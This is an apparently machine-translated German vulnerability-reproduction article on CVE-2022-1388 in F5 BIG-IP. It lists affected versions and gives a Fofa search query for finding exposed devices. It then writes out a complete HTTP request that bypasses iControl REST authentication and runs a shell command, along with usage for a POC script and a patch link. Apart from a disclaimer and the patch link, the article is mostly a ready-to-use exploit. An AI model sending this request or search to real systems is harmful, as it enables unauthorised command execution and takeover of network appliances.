Artikelverzeichnis
F5 BIG-IP weist eine Sicherheitslücke bezüglich der Remote-Befehlsausführung auf (CVE-2022-1388)
Haftungsausschluss: Verwenden Sie die relevanten Technologien in diesem Artikel nicht, um illegale Tests durchzuführen. Alle direkten oder indirekten Folgen und Verluste, die durch die Verbreitung und Verwendung der in diesem Artikel bereitgestellten Informationen oder Tools entstehen, sind vom Benutzer selbst zu tragen. Nachteilige Folgen haben hat nichts mit dem Autor des Artikels zu tun. Dieser Artikel dient nur zu Bildungszwecken.
1. Einführung in F5 BIG-IP
Offizielle WeChat-Kontosuche: Nanfeng Vulnerability Reappearance Library
Dieser Artikel wurde erstmals auf dem offiziellen Konto der Nanfeng Vulnerability Reproduktion Library veröffentlicht
F5 BIG-IP ist eine Anwendungsbereitstellungsplattform, die in die Verwaltung des Netzwerkverkehrs, die Verwaltung der Anwendungssicherheit, den Lastausgleich und andere Funktionen der F5 Corporation of the United States integriert ist.
2. Beschreibung der Schwachstelle
F5 BIG-IP ist eine Anwendungsbereitstellungsplattform, die in die Verwaltung des Netzwerkverkehrs, die Verwaltung der Anwendungssicherheit, den Lastausgleich und andere Funktionen der F5 Corporation of the United States integriert ist. In F5 BIG-IP besteht eine Sicherheitslücke aufgrund eines Zugriffskontrollfehlers, die von einem Angreifer über eine nicht offengelegte Anfrage ausgenutzt werden könnte, um die iControl REST-Authentifizierung in BIG-IP zu umgehen und die Kontrolle über ein betroffenes System zu erlangen. Kann zu Sicherheitslücken bei der Remote-Befehlsausführung führen
CVE-ID: CVE-2022-1388
CNNVD-ID: CNNVD-202205-2141
CNVD-ID:
3. Beeinflussen Sie die Version
- BIG-IP-Versionen 16.1.0 bis 16.1.2 (Patch veröffentlicht)
- BIG-IP-Versionen 15.1.0 bis 15.1.5 (Patch veröffentlicht)
- BIG-IP-Versionen 14.1.0 bis 14.1.4 (Patch veröffentlicht)
- BIG-IP-Versionen 13.1.0 bis 13.1.4 (Patch veröffentlicht)
- BIG-IP-Versionen 12.1.0 bis 12.1.6 (Ende des Supports)
- BIG-IP-Versionen 11.6.1 bis 11.6.5 (Ende des Supports)
4. Fofa-Abfrageanweisung
title="BIG-IP®- Redirect"
5. Wiederauftreten der Sicherheitslücke
Link zur Sicherheitslücke: http://127.0.0.1/mgmt/tm/util/bash
Datenpaket zur Sicherheitslücke:
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
{"command": "run" , "utilCmdArgs": "-c id" }
6.POC&EXP
Folgen Sie dem offiziellen Konto Nanfeng Vulnerability Recurrence Library und antworten Sie auf Vulnerability Recurrence 30, um die Download-Adresse des POC-Tools zu erhalten:
Verwendung:
python3 CVE-2022-1388.py -u http://127.0.0.1:8080
7. Berichtigungsmeinungen
Derzeit hat der Hersteller einen Upgrade-Patch veröffentlicht, um die Schwachstelle zu beheben. Der Link zum Erhalten des Patches lautet: https://support.f5.com/csp/article/K23605346